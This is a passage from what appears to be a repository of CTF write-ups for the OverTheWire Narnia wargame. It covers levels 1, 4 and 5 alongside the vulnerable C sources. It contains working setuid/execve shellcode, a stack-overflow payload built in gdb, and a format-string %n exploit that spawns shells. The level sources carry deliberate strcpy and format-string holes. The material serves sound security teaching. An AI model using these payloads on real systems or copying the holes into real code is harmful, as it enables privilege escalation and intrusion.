145 | >global _start 146 | >section .text 147 | >_start: 148 | >;setuid(0) 149 | >xor ebx,ebx 150 | >lea eax,[ebx+17h] 151 | >cdq 152 | >int 80h 153 | >;execve("/bin/sh",0,0) 154 | >xor ecx,ecx 155 | >push ecx 156 | >push 0x68732f6e 157 | >push 0x69622f2f 158 | >lea eax,[ecx+0Bh] 159 | >mov ebx,esp 160 | >int 80h 161 | > 162 | >-------------------[/ASM]---------------------- 163 | > 164 | >-------------------[C]---------------------- 165 | > 166 | >#include 167 | > 168 | >const char shellcode[]= "\x31\xdb" 169 | > "\x8d\x43\x17" 170 | > "\x99" 171 | > "\xcd\x80" 172 | > "\x31\xc9" 173 | > "\x51" 174 | > "\x68\x6e\x2f\x73\x68" 175 | > "\x68\x2f\x2f\x62\x69" 176 | > "\x8d\x41\x0b" 177 | > "\x89\xe3" 178 | > "\xcd\x80"; 179 | > 180 | >int main() 181 | >{ 182 | > printf ("\nSMALLEST SETUID & EXECVE GNU/LINUX x86 STABLE SHELLCODE" 183 | > "WITHOUT NULLS THAT SPAWNS A SHELL" 184 | > "\n\nCoded by Chema Garcia (aka sch3m4)" 185 | > "\n\t + sch3m4@opensec.es" 186 | > "\n\t + http://opensec.es" 187 | > "\n\n[+] Date: 29/11/2008" 188 | > "\n[+] Thanks to: vlan7" 189 | > "\n\n[+] Shellcode Size: %d bytes\n\n", 190 | > sizeof(shellcode)-1); 191 | > 192 | > (*(void (*)()) shellcode)(); 193 | > 194 | > return 0; 195 | >} 196 | > 197 | >-------------------[C]---------------------- 198 | > 199 | ># milw0rm.com [2008-11-13] 200 | >``` 201 | > 202 | > Now for the delivery. We can't just type out the shellcode into the environment variable, so like narnia0 we'll turn to python. To do this we will just nest the command so that it will execute and print the appropriate values into the environment variable. 203 | > 204 | >``` 205 | ># export EGG=$(python -c 'print "\x31\xdb\x8d\x43\x17\x99\xcd\x80\x31\xc9\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x8d\x41\x0b\x89\xe3\xcd\x80"') 206 | ># echo $EGG 207 | >1ۍC�̀1�Qhn/shh//bi�A 208 | > ��̀ 209 | >``` 210 | > 211 | > That looks about right, let's move to the server and run it. 212 | > 213 | >``` 214 | >narnia1@melinda:/narnia$ export EGG=$(python -c 'print "\x31\xdb\x8d\x43\x17\x99\xcd\x80\x31\xc9\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x8d\x41\x0b\x89\xe3\xcd\x80"') 215 | >narnia1@melinda:/narnia$ ./narnia1 216 | >Trying to execute EGG! 217 | >$ whoami 218 | >narnia2 219 | >$ cat /etc/narnia_pass/narnia2 220 | >********** 221 | >$ 222 | >``` 223 | > 224 | > On to narnia2. 225 | -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Narnia1/narnia1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/OverTheWire/Narnia/Narnia1/narnia1 -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Narnia1/narnia1.c: -------------------------------------------------------------------------------- 1 | /* 2 | This program is free software; you can redistribute it and/or modify 3 | it under the terms of the GNU General Public License as published by 4 | the Free Software Foundation; either version 2 of the License, or 5 | (at your option) any later version. 6 | 7 | This program is distributed in the hope that it will be useful, 8 | but WITHOUT ANY WARRANTY; without even the implied warranty of 9 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 10 | GNU General Public License for more details. 11 | 12 | You should have received a copy of the GNU General Public License 13 | along with this program; if not, write to the Free Software 14 | Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 15 | */ 16 | #include 17 | 18 | int main(){ 19 | int (*ret)(); 20 | 21 | if(getenv("EGG")==NULL){ 22 | printf("Give me something to execute at the env-variable EGG\n"); 23 | exit(1); 24 | } 25 | 26 | printf("Trying to execute EGG!\n"); 27 | ret = getenv("EGG"); 28 | ret(); 29 | 30 | return 0; 31 | } 32 | -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Narnia2/narnia2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/OverTheWire/Narnia/Narnia2/narnia2 -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Narnia2/narnia2.c: -------------------------------------------------------------------------------- 1 | /* 2 | This program is free software; you can redistribute it and/or modify 3 | it under the terms of the GNU General Public License as published by 4 | the Free Software Foundation; either version 2 of the License, or 5 | (at your option) any later version. 6 | 7 | This program is distributed in the hope that it will be useful, 8 | but WITHOUT ANY WARRANTY; without even the implied warranty of 9 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 10 | GNU General Public License for more details. 11 | 12 | You should have received a copy of the GNU General Public License 13 | along with this program; if not, write to the Free Software 14 | Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 15 | */ 16 | #include 17 | #include 18 | #include 19 | 20 | int main(int argc, char * argv[]){ 21 | char buf[128]; 22 | 23 | if(argc == 1){ 24 | printf("Usage: %s argument\n", argv[0]); 25 | exit(1); 26 | } 27 | strcpy(buf,argv[1]); 28 | printf("%s", buf); 29 | 30 | return 0; 31 | } 32 | -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Narnia3/narnia3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/OverTheWire/Narnia/Narnia3/narnia3 -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Narnia3/narnia3.c: -------------------------------------------------------------------------------- 1 | /* 2 | This program is free software; you can redistribute it and/or modify 3 | it under the terms of the GNU General Public License as published by 4 | the Free Software Foundation; either version 2 of the License, or 5 | (at your option) any later version. 6 | 7 | This program is distributed in the hope that it will be useful, 8 | but WITHOUT ANY WARRANTY; without even the implied warranty of 9 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 10 | GNU General Public License for more details. 11 | 12 | You should have received a copy of the GNU General Public License 13 | along with this program; if not, write to the Free Software 14 | Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 15 | */ 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | 24 | int main(int argc, char **argv){ 25 | 26 | int ifd, ofd; 27 | char ofile[16] = "/dev/null"; 28 | char ifile[32]; 29 | char buf[32]; 30 | 31 | if(argc != 2){ 32 | printf("usage, %s file, will send contents of file 2 /dev/null\n",argv[0]); 33 | exit(-1); 34 | } 35 | 36 | /* open files */ 37 | strcpy(ifile, argv[1]); 38 | if((ofd = open(ofile,O_RDWR)) < 0 ){ 39 | printf("error opening %s\n", ofile); 40 | exit(-1); 41 | } 42 | if((ifd = open(ifile, O_RDONLY)) < 0 ){ 43 | printf("error opening %s\n", ifile); 44 | exit(-1); 45 | } 46 | 47 | /* copy from file1 to file2 */ 48 | read(ifd, buf, sizeof(buf)-1); 49 | write(ofd,buf, sizeof(buf)-1); 50 | printf("copied contents of %s to a safer place... (%s)\n",ifile,ofile); 51 | 52 | /* close 'em */ 53 | close(ifd); 54 | close(ofd); 55 | 56 | exit(1); 57 | } 58 | -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Narnia4/Readme.md: -------------------------------------------------------------------------------- 1 | #Narnia4 2 | 3 | narnia.labs.overthewire.org 4 | 5 | **Username:** narnia4 6 | **Password:** see [narnia3](https://github.com/Alpackers/CTF-Writeups/tree/master/Misc/OverTheWire/Narnia/Naria3) 7 | **Description:** 8 | > This wargame is for the ones that want to learn basic exploitation. You can see the most common bugs in this game and we've tried to make them easy to exploit. You'll get the source code of each level to make it easier for you to spot the vuln and abuse it. 9 | 10 | ##Write-up 11 | 12 | > Let's start out like we normally do and execute the application. 13 | > 14 | >``` 15 | # ./narnia4 16 | # ./narnia4 Test 17 | # 18 | >``` 19 | > 20 | > Well that's weird. Let's see what we can gather from the source. 21 | > 22 | >```C 23 | /* 24 | This program is free software; you can redistribute it and/or modify 25 | it under the terms of the GNU General Public License as published by 26 | the Free Software Foundation; either version 2 of the License, or 27 | (at your option) any later version. 28 | > 29 | This program is distributed in the hope that it will be useful, 30 | but WITHOUT ANY WARRANTY; without even the implied warranty of 31 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 32 | GNU General Public License for more details. 33 | > 34 | You should have received a copy of the GNU General Public License 35 | along with this program; if not, write to the Free Software 36 | Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 37 | */ 38 | > 39 | #include 40 | #include 41 | #include 42 | #include 43 | > 44 | extern char **environ; 45 | > 46 | int main(int argc,char **argv){ 47 | int i; 48 | char buffer[256]; 49 | > 50 | for(i = 0; environ[i] != NULL; i++) 51 | memset(environ[i], '\0', strlen(environ[i])); 52 | > 53 | if(argc>1) 54 | strcpy(buffer,argv[1]); 55 | > 56 | return 0; 57 | } 58 | >``` 59 | > 60 | > Ok, similiar to previous challenges we can see the character array ```char buffer[256];``` initialized and then used in ```strcpy(buffer,argv[1]);``` without checking the size of ```argv[1]```. Let's go ahead start up gdb and poke around. 61 | > 62 | >``` 63 | (gdb) run $(python -c 'print "A"*100') 64 | Starting program: /root/narnia4 $(python -c 'print "A"*100') 65 | warning: no loadable sections found in added symbol-file system-supplied DSO at 0xf7fde000 66 | [Inferior 1 (process 6557) exited normally] 67 | (gdb) run $(python -c 'print "A"*200') 68 | Starting program: /root/narnia4 $(python -c 'print "A"*200') 69 | warning: no loadable sections found in added symbol-file system-supplied DSO at 0xf7fde000 70 | [Inferior 1 (process 6560) exited normally] 71 | (gdb) run $(python -c 'print "A"*300') 72 | Starting program: /root/narnia4 $(python -c 'print "A"*300') 73 | warning: no loadable sections found in added symbol-file system-supplied DSO at 0xf7fde000 74 | > 75 | Program received signal SIGSEGV, Segmentation fault. 76 | 0x41414141 in ?? () 77 | (gdb) c 78 | Continuing. 79 | > 80 | Program terminated with signal SIGSEGV, Segmentation fault. 81 | The program no longer exists. 82 | (gdb) run $(python -c 'print "A"*275') 83 | Starting program: /root/narnia4 $(python -c 'print "A"*275') 84 | warning: no loadable sections found in added symbol-file system-supplied DSO at 0xf7fde000 85 | > 86 | Program received signal SIGSEGV, Segmentation fault. 87 | 0x00414141 in ?? () 88 | (gdb) c 89 | Continuing. 90 | > 91 | Program terminated with signal SIGSEGV, Segmentation fault. 92 | The program no longer exists. 93 | (gdb) run $(python -c 'print "A"*276') 94 | Starting program: /root/narnia4 $(python -c 'print "A"*276') 95 | warning: no loadable sections found in added symbol-file system-supplied DSO at 0xf7fde000 96 | > 97 | Program received signal SIGSEGV, Segmentation fault. 98 | 0x41414141 in ?? () 99 | >``` 100 | > 101 | > Ok, we saw our ```A``` when we submitted 300 of them. After backing off to 275, we see 3 positions overwritten with ```A```. Adding one to that looks like we have our magic number as it appears we have overwritten a return address successfully with ```0x41414141``` with 276 ```A```. 102 | > 103 | > Let's see if we can pinpoint a location for our 28 byte shellcode and an address to return back to. 104 | > 105 | >```asm 106 | (gdb) run $(python -c 'print "A"*244+"R"*28+"A"*4') 107 | Starting program: /root/narnia4 $(python -c 'print "A"*244+"R"*28+"A"*4') 108 | warning: no loadable sections found in added symbol-file system-supplied DSO at 0xf7fde000 109 | > 110 | Program received signal SIGSEGV, Segmentation fault. 111 | 0x41414141 in ?? () 112 | (gdb) x/300x $esp 113 | 0xffffd400: 0x00000000 0xffffd4a4 0xffffd4b0 0xf7fdb860 114 | 0xffffd410: 0xf7ff4821 0xffffffff 0xf7ffcff4 0x0804828b 115 | 0xffffd420: 0x00000001 0xffffd460 0xf7fedc16 0xf7ffdac0 116 | 0xffffd430: 0xf7fdbb58 0xf7fb6ff4 0x00000000 0x00000000 117 | 0xffffd440: 0xffffd478 0x6a7d42c1 0x586954d1 0x00000000 118 | 0xffffd450: 0x00000000 0x00000000 0x00000002 0x080483b0 119 | 0xffffd460: 0x00000000 0xf7ff39c0 0xf7e6dd6b 0xf7ffcff4 120 | 0xffffd470: 0x00000002 0x080483b0 0x00000000 0x080483d1 121 | 0xffffd480: 0x080484ad 0x00000002 0xffffd4a4 0x08048550 122 | 0xffffd490: 0x080485c0 0xf7fee590 0xffffd49c 0xf7ffd908 123 | 0xffffd4a0: 0x00000002 0xffffd5f3 0xffffd601 0x00000000 124 | 0xffffd4b0: 0xffffd716 0xffffd729 0xffffd75c 0xffffd767 125 | 0xffffd4c0: 0xffffd777 0xffffd7c5 0xffffd7d7 0xffffd809 126 | 0xffffd4d0: 0xffffd813 0xffffdd34 0xffffdd62 0xffffddb0 127 | 0xffffd4e0: 0xffffddbe 0xffffddc9 0xffffdde1 0xffffde23 128 | 0xffffd4f0: 0xffffde32 0xffffde3c 0xffffde4d 0xffffde64 129 | 0xffffd500: 0xffffde79 0xffffde82 0xffffde95 0xffffdea0 130 | 0xffffd510: 0xffffdea8 0xffffded4 0xffffdee1 0xffffdf43 131 | 0xffffd520: 0xffffdf80 0xffffdf8d 0xffffdf9a 0xffffdfb3 132 | 0xffffd530: 0x00000000 0x00000020 0xf7fded00 0x00000021 133 | 0xffffd540: 0xf7fde000 0x00000010 0x0fabfbff 0x00000006 134 | 0xffffd550: 0x00001000 0x00000011 0x00000064 0x00000003 135 | 0xffffd560: 0x08048034 0x00000004 0x00000020 0x00000005 136 | 0xffffd570: 0x00000008 0x00000007 0xf7fe0000 0x00000008 137 | 0xffffd580: 0x00000000 0x00000009 0x080483b0 0x0000000b 138 | 0xffffd590: 0x00000000 0x0000000c 0x00000000 0x0000000d 139 | 0xffffd5a0: 0x00000000 0x0000000e 0x00000000 0x00000017 140 | 0xffffd5b0: 0x00000000 0x00000019 0xffffd5db 0x0000001f 141 | 0xffffd5c0: 0xffffdfea 0x0000000f 0xffffd5eb 0x00000000 142 | 0xffffd5d0: 0x00000000 0x00000000 0x0d000000 0xa1628788 143 | 0xffffd5e0: 0x159f4aea 0x401aef6a 0x691a76d9 0x00363836 144 | 0xffffd5f0: 0x2f000000 0x746f6f72 0x72616e2f 0x3461696e 145 | 0xffffd600: 0x41414100 0x41414141 0x41414141 0x41414141 146 | 0xffffd610: 0x41414141 0x41414141 0x41414141 0x41414141 147 | 0xffffd620: 0x41414141 0x41414141 0x41414141 0x41414141 148 | 0xffffd630: 0x41414141 0x41414141 0x41414141 0x41414141 149 | 0xffffd640: 0x41414141 0x41414141 0x41414141 0x41414141 150 | 0xffffd650: 0x41414141 0x41414141 0x41414141 0x41414141 151 | 0xffffd660: 0x41414141 0x41414141 0x41414141 0x41414141 152 | 0xffffd670: 0x41414141 0x41414141 0x41414141 0x41414141 153 | 0xffffd680: 0x41414141 0x41414141 0x41414141 0x41414141 154 | 0xffffd690: 0x41414141 0x41414141 0x41414141 0x41414141 155 | 0xffffd6a0: 0x41414141 0x41414141 0x41414141 0x41414141 156 | 0xffffd6b0: 0x41414141 0x41414141 0x41414141 0x41414141 157 | 0xffffd6c0: 0x41414141 0x41414141 0x41414141 0x41414141 158 | 0xffffd6d0: 0x41414141 0x41414141 0x41414141 0x41414141 159 | 0xffffd6e0: 0x41414141 0x41414141 0x41414141 0x41414141 160 | 0xffffd6f0: 0x41414141 0x52525241 0x52525252 0x52525252 161 | 0xffffd700: 0x52525252 0x52525252 0x52525252 0x52525252 162 | 0xffffd710: 0x41414152 0x00000041 0x00000000 0x00000000 163 | >``` 164 | > 165 | > Ok, so it looks like we can return back to ```0xffffd6f4``` and put our shellcode there. Let's try it. 166 | > 167 | >``` 168 | (gdb) run $(python -c 'print "A"*244+"\x31\xdb\x8d\x43\x17\x99\xcd\x80\x31\xc9\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x8d\x41\x0b\x89\xe3\xcd\x80"+"\xf4\xd6\xff\xff"') 169 | Starting program: /root/narnia4 $(python -c 'print "A"*244+"\x31\xdb\x8d\x43\x17\x99\xcd\x80\x31\xc9\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x8d\x41\x0b\x89\xe3\xcd\x80"+"\xf4\xd6\xff\xff"') 170 | warning: no loadable sections found in added symbol-file system-supplied DSO at 0xf7fde000 171 | process 6592 is executing new program: /bin/dash 172 | warning: Selected architecture i386:x86-64 is not compatible with reported target architecture i386 173 | Architecture of file not recognized. 174 | >``` 175 | > 176 | > We've seen this before. It looks like everything is working locally (just the wrong architecture for the shellcode). Let's move to the server and see if we need to remap anything. 177 | > 178 | >```asm 179 | narnia4@melinda:/narnia$ gdb narnia4 180 | (gdb) run $(python -c 'print "A"*244+"R"*28+"A"*4') 181 | Starting program: /games/narnia/narnia4 $(python -c 'print "A"*244+"R"*28+"A"*4') 182 | > 183 | Program received signal SIGSEGV, Segmentation fault. 184 | 0x41414141 in ?? () 185 | (gdb) x/300x $esp 186 | 0xffffd5d0: 0x00000000 0xffffd664 0xffffd670 0xf7feacea 187 | 0xffffd5e0: 0x00000002 0xffffd664 0xffffd604 0x080497cc 188 | 0xffffd5f0: 0x0804825c 0xf7fca000 0x00000000 0x00000000 189 | 0xffffd600: 0x00000000 0xd35f81d1 0xeb6065c1 0x00000000 190 | 0xffffd610: 0x00000000 0x00000000 0x00000002 0x080483b0 191 | 0xffffd620: 0x00000000 0xf7ff0500 0xf7e3c979 0xf7ffd000 192 | 0xffffd630: 0x00000002 0x080483b0 0x00000000 0x080483d1 193 | 0xffffd640: 0x080484ad 0x00000002 0xffffd664 0x08048550 194 | 0xffffd650: 0x080485c0 0xf7feb180 0xffffd65c 0x0000001c 195 | 0xffffd660: 0x00000002 0xffffd79b 0xffffd7b1 0x00000000 196 | 0xffffd670: 0xffffd8c6 0xffffd8db 0xffffd8eb 0xffffd8f6 197 | 0xffffd680: 0xffffd916 0xffffd92a 0xffffd933 0xffffd940 198 | 0xffffd690: 0xffffde61 0xffffde6c 0xffffde78 0xffffded6 199 | 0xffffd6a0: 0xffffdeed 0xffffdefc 0xffffdf08 0xffffdf19 200 | 0xffffd6b0: 0xffffdf22 0xffffdf35 0xffffdf3d 0xffffdf4d 201 | 0xffffd6c0: 0xffffdf80 0xffffdfa0 0xffffdfc0 0x00000000 202 | 0xffffd6d0: 0x00000020 0xf7fdbb20 0x00000021 0xf7fdb000 203 | 0xffffd6e0: 0x00000010 0x1f898b75 0x00000006 0x00001000 204 | 0xffffd6f0: 0x00000011 0x00000064 0x00000003 0x08048034 205 | 0xffffd700: 0x00000004 0x00000020 0x00000005 0x00000008 206 | 0xffffd710: 0x00000007 0xf7fdc000 0x00000008 0x00000000 207 | 0xffffd720: 0x00000009 0x080483b0 0x0000000b 0x000036b4 208 | 0xffffd730: 0x0000000c 0x000036b4 0x0000000d 0x000036b4 209 | 0xffffd740: 0x0000000e 0x000036b4 0x00000017 0x00000000 210 | 0xffffd750: 0x00000019 0xffffd77b 0x0000001f 0xffffdfe2 211 | 0xffffd760: 0x0000000f 0xffffd78b 0x00000000 0x00000000 212 | 0xffffd770: 0x00000000 0x00000000 0x5d000000 0x1086f177 213 | 0xffffd780: 0xbf17167a 0x902c70f3 0x69509589 0x00363836 214 | 0xffffd790: 0x00000000 0x00000000 0x2f000000 0x656d6167 215 | 0xffffd7a0: 0x616e2f73 0x61696e72 0x72616e2f 0x3461696e 216 | 0xffffd7b0: 0x41414100 0x41414141 0x41414141 0x41414141 217 | 0xffffd7c0: 0x41414141 0x41414141 0x41414141 0x41414141 218 | 0xffffd7d0: 0x41414141 0x41414141 0x41414141 0x41414141 219 | 0xffffd7e0: 0x41414141 0x41414141 0x41414141 0x41414141 220 | 0xffffd7f0: 0x41414141 0x41414141 0x41414141 0x41414141 221 | 0xffffd800: 0x41414141 0x41414141 0x41414141 0x41414141 222 | 0xffffd810: 0x41414141 0x41414141 0x41414141 0x41414141 223 | 0xffffd820: 0x41414141 0x41414141 0x41414141 0x41414141 224 | 0xffffd830: 0x41414141 0x41414141 0x41414141 0x41414141 225 | 0xffffd840: 0x41414141 0x41414141 0x41414141 0x41414141 226 | 0xffffd850: 0x41414141 0x41414141 0x41414141 0x41414141 227 | 0xffffd860: 0x41414141 0x41414141 0x41414141 0x41414141 228 | 0xffffd870: 0x41414141 0x41414141 0x41414141 0x41414141 229 | 0xffffd880: 0x41414141 0x41414141 0x41414141 0x41414141 230 | 0xffffd890: 0x41414141 0x41414141 0x41414141 0x41414141 231 | 0xffffd8a0: 0x41414141 0x52525241 0x52525252 0x52525252 232 | 0xffffd8b0: 0x52525252 0x52525252 0x52525252 0x52525252 233 | 0xffffd8c0: 0x41414152 0x00000041 0x00000000 0x00000000 234 | >``` 235 | > 236 | > Looks like we need to update our return address to ```0xffffd8a4```. 237 | > 238 | >``` 239 | narnia4@melinda:/narnia$ ./narnia4 $(python -c 'print "A"*244+"\x31\xdb\x8d\x43\x17\x99\xcd\x80\x31\xc9\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x8d\x41\x0b\x89\xe3\xcd\x80"+"\xa4\xd8\xff\xff"') 240 | $ whoami 241 | narnia5 242 | $ cat /etc/narnia_pass/narnia5 243 | ********** 244 | $ 245 | >``` 246 | > 247 | > Well that one seemed easier. Let's head to narnia5. 248 | -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Narnia4/narnia4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/OverTheWire/Narnia/Narnia4/narnia4 -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Narnia4/narnia4.c: -------------------------------------------------------------------------------- 1 | /* 2 | This program is free software; you can redistribute it and/or modify 3 | it under the terms of the GNU General Public License as published by 4 | the Free Software Foundation; either version 2 of the License, or 5 | (at your option) any later version. 6 | 7 | This program is distributed in the hope that it will be useful, 8 | but WITHOUT ANY WARRANTY; without even the implied warranty of 9 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 10 | GNU General Public License for more details. 11 | 12 | You should have received a copy of the GNU General Public License 13 | along with this program; if not, write to the Free Software 14 | Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 15 | */ 16 | 17 | #include 18 | #include 19 | #include 20 | #include 21 | 22 | extern char **environ; 23 | 24 | int main(int argc,char **argv){ 25 | int i; 26 | char buffer[256]; 27 | 28 | for(i = 0; environ[i] != NULL; i++) 29 | memset(environ[i], '\0', strlen(environ[i])); 30 | 31 | if(argc>1) 32 | strcpy(buffer,argv[1]); 33 | 34 | return 0; 35 | } 36 | -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Narnia5/Readme.md: -------------------------------------------------------------------------------- 1 | #Narnia5 2 | 3 | narnia.labs.overthewire.org 4 | 5 | **Username:** narnia5 6 | **Password:** see [narnia4](https://github.com/Alpackers/CTF-Writeups/tree/master/Misc/OverTheWire/Narnia/Naria4) 7 | **Description:** 8 | > This wargame is for the ones that want to learn basic exploitation. You can see the most common bugs in this game and we've tried to make them easy to exploit. You'll get the source code of each level to make it easier for you to spot the vuln and abuse it. 9 | 10 | ##Write-up 11 | 12 | > Just running the program provides us a little bit of a hint. 13 | > 14 | >``` 15 | # ./narnia5 16 | Change i's value from 1 -> 500. No way...let me give you a hint! 17 | buffer : [] (0) 18 | i = 1 (0xffb60dbc) 19 | >``` 20 | > 21 | > Peeking at the code we see: 22 | > 23 | >```C 24 | /* 25 | This program is free software; you can redistribute it and/or modify 26 | it under the terms of the GNU General Public License as published by 27 | the Free Software Foundation; either version 2 of the License, or 28 | (at your option) any later version. 29 | > 30 | This program is distributed in the hope that it will be useful, 31 | but WITHOUT ANY WARRANTY; without even the implied warranty of 32 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 33 | GNU General Public License for more details. 34 | > 35 | You should have received a copy of the GNU General Public License 36 | along with this program; if not, write to the Free Software 37 | Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 38 | */ 39 | #include 40 | #include 41 | #include 42 | > 43 | int main(int argc, char **argv){ 44 | int i = 1; 45 | char buffer[64]; 46 | > 47 | snprintf(buffer, sizeof buffer, argv[1]); 48 | buffer[sizeof (buffer) - 1] = 0; 49 | printf("Change i's value from 1 -> 500. "); 50 | > 51 | if(i==500){ 52 | printf("GOOD\n"); 53 | system("/bin/sh"); 54 | } 55 | > 56 | printf("No way...let me give you a hint!\n"); 57 | printf("buffer : [%s] (%d)\n", buffer, strlen(buffer)); 58 | printf ("i = %d (%p)\n", i, &i); 59 | return 0; 60 | } 61 | >``` 62 | > 63 | > Ok, looks like we need to manipulate the value of ```i```. There is a lot of ```printf``` usage. Let's try some basic string format entries. 64 | > 65 | >``` 66 | # ./narnia5 %x%x 67 | Change i's value from 1 -> 500. No way...let me give you a hint! 68 | buffer : [f76b9960ffb1f4e6] (16) 69 | i = 1 (0xffb1f50c) 70 | >``` 71 | > 72 | > Looks like the right track. Let's move to gdb and see if we can find our way back up the stack to our input. 73 | > 74 | >``` 75 | (gdb) run $(python -c 'print "AAAA"')%x%x%x%x%x%x%x 76 | Starting program: /root/narnia5 $(python -c 'print "AAAA"')%x%x%x%x%x%x%x 77 | warning: no loadable sections found in added symbol-file system-supplied DSO at 0xf7fde000 78 | Change i's value from 1 -> 500. No way...let me give you a hint! 79 | buffer : [AAAAf7ed8960ffffd4c6f7e86315ffffd4c7414141416465376630363938] (60) 80 | i = 1 (0xffffd4ec) 81 | [Inferior 1 (process 7402) exited normally] 82 | (gdb) run $(python -c 'print "AAAA"')%x%x%x%x%x 83 | Starting program: /root/narnia5 $(python -c 'print "AAAA"')%x%x%x%x%x 84 | warning: no loadable sections found in added symbol-file system-supplied DSO at 0xf7fde000 85 | Change i's value from 1 -> 500. No way...let me give you a hint! 86 | buffer : [AAAAf7ed8960ffffd4c6f7e86315ffffd4c741414141] (44) 87 | i = 1 (0xffffd4ec) 88 | [Inferior 1 (process 7399) exited normally] 89 | >``` 90 | > 91 | > Looks like we have to read 5 times before we get back to our input. They are already giving us the location of ```i``` as ```0xffffd4ec```, so we should be able to move directly into trying to overwrite the value. To do this we'll use the ```%n``` format as it ```writes the number of bytes written so far```. We can specify the address to change by inserting it at the begining of our input and using ```%x``` to get back to it. Then all we need to do is insert the correct number of bytes and we should be able to overwrite ```i``` with the value ```500```. 92 | > 93 | >``` 94 | (gdb) run $(python -c 'print "\xec\xd4\xff\xff"')%08x%08x%08x%08x%n 95 | Starting program: /root/narnia5 $(python -c 'print "\xec\xd4\xff\xff"')%08x%08x%08x%08x%n 96 | warning: no loadable sections found in added symbol-file system-supplied DSO at 0xf7fde000 97 | Change i's value from 1 -> 500. No way...let me give you a hint! 98 | buffer : [����f7ed8960ffffd4c6f7e86315ffffd4c7] (36) 99 | i = 36 (0xffffd4ec) 100 | >``` 101 | > 102 | > By switching to ```%n``` we can see that we change the value of ```i``` from 1 to 36 so everything appears to be working as expected. Let's go straight for 500. 103 | > 104 | >``` 105 | [Inferior 1 (process 7340) exited normally] 106 | (gdb) run $(python -c 'print "\xec\xd4\xff\xff"+"A"*464')%08x%08x%08x%08x%n 107 | Starting program: /root/narnia5 $(python -c 'print "\xec\xd4\xff\xff"+"A"*464')%08x%08x%08x%08x%n 108 | warning: no loadable sections found in added symbol-file system-supplied DSO at 0xf7fde000 109 | Change i's value from 1 -> 500. No way...let me give you a hint! 110 | buffer : [����AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA] (63) 111 | i = 1 (0xffffd31c) 112 | [Inferior 1 (process 7344) exited normally] 113 | >``` 114 | > 115 | > Padded 464 ```A``` to make a total of 500, but it looks like our address for ```i``` has moved. Let's update that address and try the same payload. 116 | > 117 | >``` 118 | (gdb) run $(python -c 'print "\x1c\xd3\xff\xff"+"A"*464')%08x%08x%08x%08x%n 119 | Starting program: /root/narnia5 $(python -c 'print "\x1c\xd3\xff\xff"+"A"*464')%08x%08x%08x%08x%n 120 | warning: no loadable sections found in added symbol-file system-supplied DSO at 0xf7fde000 121 | Change i's value from 1 -> 500. GOOD 122 | # whoami 123 | root 124 | >``` 125 | > 126 | > That looks better. We are in gdb on the local box. Let's go see if we can reproduce this on the server. 127 | > 128 | >``` 129 | narnia5@melinda:/narnia$ ./narnia5 $(python -c 'print "\x1c\xd3\xff\xff"+"A"*464')%08x%08x%08x%08x%n 130 | Change i's value from 1 -> 500. No way...let me give you a hint! 131 | buffer : [���AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA] (63) 132 | i = 1 (0xffffd50c) 133 | >``` 134 | > 135 | > Address for ```i``` changed again. We know what to do. 136 | > 137 | >``` 138 | narnia5@melinda:/narnia$ ./narnia5 $(python -c 'print "\x0c\xd5\xff\xff"+"A"*464')%08x%08x%08x%08x%n 139 | Change i's value from 1 -> 500. GOOD 140 | $ whoami 141 | narnia6 142 | $ cat /etc/narnia_pass/narnia6 143 | ********** 144 | $ 145 | >``` 146 | > 147 | > Man that never gets old. On to narnia6. 148 | -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Narnia5/narnia5: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/OverTheWire/Narnia/Narnia5/narnia5 -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Narnia5/narnia5.c: -------------------------------------------------------------------------------- 1 | /* 2 | This program is free software; you can redistribute it and/or modify 3 | it under the terms of the GNU General Public License as published by 4 | the Free Software Foundation; either version 2 of the License, or 5 | (at your option) any later version. 6 | 7 